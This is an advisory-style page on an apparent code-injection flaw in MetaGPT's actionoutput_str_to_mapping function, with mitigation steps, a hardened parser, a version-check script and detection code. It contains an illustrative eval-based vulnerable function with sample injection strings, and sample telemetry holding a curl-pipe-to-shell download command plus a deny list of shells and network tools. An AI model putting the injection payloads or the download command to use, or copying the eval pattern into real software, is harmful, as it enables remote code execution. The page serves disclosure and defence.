CVE-2026-0761
📋 TL;DR
This critical vulnerability allows unauthenticated remote attackers to execute arbitrary Python code on systems running vulnerable versions of Foundation Agents MetaGPT. The flaw is in the actionoutput_str_to_mapping function, which evaluates attacker-controlled strings as Python without validating them first. Any deployment that lets untrusted data reach an affected MetaGPT installation is exposed to full compromise of the account that runs it.
💻 Affected Systems
- Foundation Agents MetaGPT
📦 What is this software?
MetaGPT by DeepWisdom: an open-source multi-agent framework that assigns roles to LLM-driven agents to carry out software-engineering tasks. The project is published on GitHub under the Foundation Agents organization, which is why the advisory names it "Foundation Agents MetaGPT".
⚠️ Risk & Real-World Impact
Worst Case
Complete system takeover with attacker gaining service account privileges, data exfiltration, lateral movement, and persistent backdoor installation.
Likely Case
Remote code execution leading to data theft, cryptocurrency mining, or ransomware deployment on vulnerable systems.
If Mitigated
Limited impact if proper network segmentation, least privilege, and input validation controls are implemented.
🎯 Exploit Status
ZDI-CAN-28124 is the Zero Day Initiative case number for the coordinated disclosure that produced advisory ZDI-26-027; this page references no public proof of concept. Because the flaw requires no authentication and little attacker effort (a crafted string reaching the vulnerable function), weaponization is considered likely.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific version
Vendor Advisory: https://www.zerodayinitiative.com/advisories/ZDI-26-027/
Restart Required: Yes
Instructions:
1. Check the ZDI advisory (ZDI-26-027) and the MetaGPT release notes for the fixed version
2. Upgrade the metagpt package, and any vendored copy of its code, to that version
3. Restart every process that imports MetaGPT so the old module is no longer loaded
4. Confirm the installed version and that the fix is in place (see How to Verify below)
🔧 Temporary Workarounds
Network Isolation
Linux: Restrict network access to MetaGPT instances. This only helps where MetaGPT is reachable as a network service; where it runs as a library or CLI, the untrusted input arrives through whatever feeds data into the vulnerable function, so restrict those sources (files, queues, upstream services) as well. The bracketed values are placeholders, and the ACCEPT rule must precede the DROP rule.
iptables -A INPUT -p tcp --dport [META_PORT] -s [TRUSTED_IPS] -j ACCEPT
iptables -A INPUT -p tcp --dport [META_PORT] -j DROP
Input Validation Wrapper
All platforms: Validate input before it reaches the vulnerable function
Wrap or replace actionoutput_str_to_mapping so that its string values are checked against an allowlist of expected type expressions and anything else is rejected, rather than being handed to the interpreter.
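The following is an added example, not MetaGPT's own code, of what such a wrapper looks like. The `unsafe_str_to_mapping` function is an assumed illustration of the eval-based pattern the advisory describes (the real function's signature and the exact strings it accepts must be checked against the installed package); `safe_str_to_mapping` parses each value to an AST and rebuilds it from an allowlist of type names, so no string is ever evaluated. The allowed names, the length cap and the sample inputs are all assumptions. Requires Python 3.9 or later for builtin generics such as `list[str]`.

```python
"""Eval-based type-string mapping versus an allowlist parser (added example).

The unsafe function illustrates the pattern named in the advisory; it is an
assumption about the shape of the bug, not MetaGPT's source.
Requires Python 3.9+ (builtin generics such as list[str]).
"""
import ast
from typing import Any, Dict

# Hypothetical vulnerable form: every value string reaches eval(), so a value
# such as "__import__('os').system('id')" runs with the service's privileges.
def unsafe_str_to_mapping(mapping: Dict[str, str]) -> Dict[str, Any]:
    return {key: eval(value) for key, value in mapping.items()}


class UnsafeTypeString(ValueError):
    """Raised when a value is not a plain type expression from the allowlist."""


# Only these names may appear (assumed allowlist); attributes, calls, lambdas
# and arbitrary names such as __import__ are rejected before anything is built.
_ALLOWED_NAMES = {
    "str": str, "int": int, "float": float, "bool": bool,
    "list": list, "dict": dict, "tuple": tuple, "set": set, "Any": Any,
}
_SUBSCRIPTABLE = (list, dict, tuple, set)
_MAX_LEN = 256  # assumed cap: untrusted input should not drive parser cost


def _build(node: ast.AST) -> Any:
    """Turn an allowlisted AST node into a type object; reject anything else."""
    if isinstance(node, ast.Constant) and node.value is Ellipsis:
        return ...
    if isinstance(node, ast.Name):
        if node.id == "Ellipsis":
            return ...
        if node.id in _ALLOWED_NAMES:
            return _ALLOWED_NAMES[node.id]
        raise UnsafeTypeString(f"name not allowed: {node.id}")
    if isinstance(node, ast.Tuple):
        return tuple(_build(elt) for elt in node.elts)
    if isinstance(node, ast.Subscript):
        base = _build(node.value)
        if base not in _SUBSCRIPTABLE:
            raise UnsafeTypeString("only list/dict/tuple/set may take parameters")
        return base[_build(node.slice)]
    raise UnsafeTypeString(f"unsupported syntax: {type(node).__name__}")


def safe_str_to_mapping(mapping: Dict[str, str]) -> Dict[str, Any]:
    """Hardened replacement: parse to an AST, then rebuild from the allowlist."""
    result: Dict[str, Any] = {}
    for key, value in mapping.items():
        if not isinstance(value, str) or len(value) > _MAX_LEN:
            raise UnsafeTypeString(f"{key}: value must be a short string")
        try:
            tree = ast.parse(value.strip(), mode="eval")
        except SyntaxError as exc:
            raise UnsafeTypeString(f"{key}: not a type expression") from exc
        result[key] = _build(tree.body)
    return result


def is_rejected(value: str) -> bool:
    """True if the hardened parser refuses `value`."""
    try:
        safe_str_to_mapping({"field": value})
    except UnsafeTypeString:
        return True
    return False


if __name__ == "__main__":
    # Constructed input of the kind such a mapping is meant to carry.
    good = {"names": "(list[str], Ellipsis)", "counts": "(dict[str, int], ...)"}
    print(safe_str_to_mapping(good))
    # Constructed hostile input: the unsafe form executes it, the safe form refuses.
    hostile = "__import__('os').getpid()"
    print("unsafe ran the attacker's expression:", unsafe_str_to_mapping({"x": hostile}))
    print("safe rejected it:", is_rejected(hostile))
```

The point of rebuilding from the AST rather than, say, checking the string with a regular expression is that the grammar is enforced structurally: a value is either a tuple of allowlisted names, generics over those names and `Ellipsis`, or it is refused, so there is no way to smuggle a call or attribute access past the check.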
🧯 If You Can't Patch
- Immediately isolate vulnerable systems from internet and critical networks
- Implement strict network segmentation and monitor for exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Confirm the installed MetaGPT version is older than the fixed release named in the advisory and that the actionoutput_str_to_mapping function is present in the installed code.
Check Version:
Read the version from the installed package metadata (the metagpt distribution on PyPI) or from the MetaGPT documentation's version command.
Verify Fix Applied:
Confirm the version is at or above the fixed release and that the function no longer passes untrusted strings to the interpreter; feed it a malformed value and check that it is rejected rather than evaluated.
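As an added example (not part of the page or the MetaGPT project), the script below reports the installed metagpt version and inspects the source of the vulnerable function for direct calls to eval-like builtins. The module path `metagpt.utils.serialize` and the function name are assumptions taken from this page and must be confirmed against the installed package; the absence of such calls is only a heuristic, and the fixed version named in the advisory is the authoritative check.

```python
"""Report the installed MetaGPT version and scan a function for eval-like calls.

Added example. Module path and function name are assumptions to confirm
against the installed package; the advisory's fixed version is authoritative.
"""
import ast
import importlib
import inspect
import textwrap
from importlib import metadata
from typing import Dict, List, Optional

# Builtins that turn data into code; a direct call to any of them in a
# function that handles untrusted strings is the red flag.
DYNAMIC_EVAL = {"eval", "exec", "compile", "__import__"}


def dynamic_eval_calls(source: str) -> List[str]:
    """Return 'name:line' for every direct call to an eval-like builtin in source."""
    hits: List[str] = []
    for node in ast.walk(ast.parse(textwrap.dedent(source))):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in DYNAMIC_EVAL):
            hits.append(f"{node.func.id}:{node.lineno}")
    return hits


def function_source(module_name: str, func_name: str) -> Optional[str]:
    """Source text of module.func if the module imports and the name exists."""
    try:
        module = importlib.import_module(module_name)
    except ImportError:
        return None
    func = getattr(module, func_name, None)
    return inspect.getsource(func) if func is not None else None


def installed_version(dist: str = "metagpt") -> Optional[str]:
    """Version string from package metadata, or None if not installed."""
    try:
        return metadata.version(dist)
    except metadata.PackageNotFoundError:
        return None


def check_metagpt(module_name: str = "metagpt.utils.serialize",
                  func_name: str = "actionoutput_str_to_mapping") -> Dict[str, object]:
    """Combine version and source findings into one report (defaults are assumed)."""
    src = function_source(module_name, func_name)
    return {
        "version": installed_version(),
        "function_found": src is not None,
        "dynamic_eval_calls": dynamic_eval_calls(src) if src else [],
    }


if __name__ == "__main__":
    print(check_metagpt())
```

Run this inside the same virtual environment that the MetaGPT service uses; a report with `function_found` true and a non-empty `dynamic_eval_calls` list on a version below the fix is a strong signal that the host is still exposed.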
📡 Detection & Monitoring
Log Indicators:
- MetaGPT processes doing work outside their normal pattern (new modules, unexpected file writes, long-running helpers)
- Tracebacks in MetaGPT logs from eval() or exec() failing on malformed input, which can indicate injection attempts that did not parse
- Unexpected child processes (shells, downloaders, interpreters) spawned by the Python process running MetaGPT
Network Indicators:
- Unusual outbound connections from MetaGPT host
- Traffic to known malicious IPs
SIEM Query (field names are placeholders to map onto your schema; the parentheses matter, since without them AND binds tighter than OR and the two conditions merge):
(source="metagpt" AND (eval OR exec OR __import__)) OR (parent_cmdline="*metagpt*" AND (process_name="sh" OR process_name="bash" OR process_name="curl" OR process_name="wget"))
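The same child-process logic, run offline over constructed process-creation events, as an added example that is not part of the page. The event schema (pid, ppid, exe, cmdline) is a simplified stand-in for EDR or auditd telemetry, the shell and tool names are an assumed allow/deny list, and a MetaGPT process is identified by the assumption that "metagpt" appears in its command line; adjust all three to your environment. Only direct children are flagged, which is the question the SIEM query above asks.

```python
"""Flag shells and downloaders spawned directly by a MetaGPT python process.

Added example. Events use a constructed, simplified schema; map the field
names onto your own telemetry. Matching on "metagpt" in the command line
is an assumption about how the service is launched.
"""
import json
import os
from typing import Dict, Iterable, List

# Assumed deny list: programs a code-generation agent has no reason to launch
# directly, and which post-exploitation payloads almost always do.
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat"}


def is_metagpt_process(event: Dict[str, object]) -> bool:
    """A python interpreter whose command line references metagpt (assumed)."""
    exe = os.path.basename(str(event.get("exe", "")))
    return exe.startswith("python") and "metagpt" in str(event.get("cmdline", "")).lower()


def suspicious_children(events: Iterable[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return events for suspicious programs whose parent is a MetaGPT process."""
    events = list(events)
    metagpt_pids = {e["pid"] for e in events if is_metagpt_process(e)}
    alerts = []
    for e in events:
        if e.get("ppid") in metagpt_pids and \
                os.path.basename(str(e.get("exe", ""))) in SUSPICIOUS_CHILDREN:
            alerts.append(e)
    return alerts


# Constructed sample telemetry: one MetaGPT process, one benign child (git),
# one hostile child (sh -c with a download), and an unrelated python app
# spawning a shell, which should not be flagged.
SAMPLE_EVENTS_JSONL = """\
{"ts": "2026-01-10T12:00:01Z", "pid": 4100, "ppid": 1, "exe": "/opt/venv/bin/python3", "cmdline": "/opt/venv/bin/python3 /opt/venv/bin/metagpt 'Write a snake game'"}
{"ts": "2026-01-10T12:00:05Z", "pid": 4150, "ppid": 4100, "exe": "/usr/bin/git", "cmdline": "git status"}
{"ts": "2026-01-10T12:00:09Z", "pid": 4188, "ppid": 4100, "exe": "/bin/sh", "cmdline": "sh -c 'curl http://203.0.113.5/x | sh'"}
{"ts": "2026-01-10T12:00:09Z", "pid": 4190, "ppid": 4188, "exe": "/usr/bin/curl", "cmdline": "curl http://203.0.113.5/x"}
{"ts": "2026-01-10T12:00:20Z", "pid": 5000, "ppid": 1, "exe": "/usr/bin/python3", "cmdline": "python3 app.py"}
{"ts": "2026-01-10T12:00:21Z", "pid": 5001, "ppid": 5000, "exe": "/bin/sh", "cmdline": "sh -c ls"}
"""


def load_events(jsonl: str) -> List[Dict[str, object]]:
    """Parse one JSON object per line, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


if __name__ == "__main__":
    for alert in suspicious_children(load_events(SAMPLE_EVENTS_JSONL)):
        print(f"ALERT pid={alert['pid']} ppid={alert['ppid']} cmd={alert['cmdline']}")
```

The curl process (pid 4190) is not reported because its parent is the shell, not MetaGPT; if you want the whole tree, walk ppid links up to a MetaGPT ancestor instead of checking one hop.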